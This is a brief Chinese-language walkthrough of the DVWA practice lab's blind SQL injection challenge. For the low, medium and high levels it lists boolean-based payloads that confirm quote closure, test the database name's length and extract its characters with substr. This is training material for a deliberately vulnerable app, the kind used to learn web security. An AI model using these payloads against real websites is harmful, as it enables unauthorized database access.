DVWA靶场通关-SQL Injection (Blind)

SQL Injection (Blind)

low

# 确定闭合
payload: 1' #

# 确定数据库名长度
payload: 1' and length(database())=4 #

# 爆库、爆表、爆字段
payload: 1' and substr(database(),1,1)='d' #

medium

# 确定显示列数
payload: id=1&Submit=Submit

# 确定数据库名长度
payload: id=1 and length(database())=4 &Submit=Submit

# 爆库、爆表、爆字段
payload: id=1 and substr(database(),1,1)='d'&Submit=Submit

high

# 确定闭合
payload: 1' #

# 确定数据库名长度
payload: 1' and length(database())=4 #

# 爆库、爆表、爆字段
payload: 1' and substr(database(),1,1)='d' #

你可能感兴趣的:(DVWA靶场通关,mysql,web安全)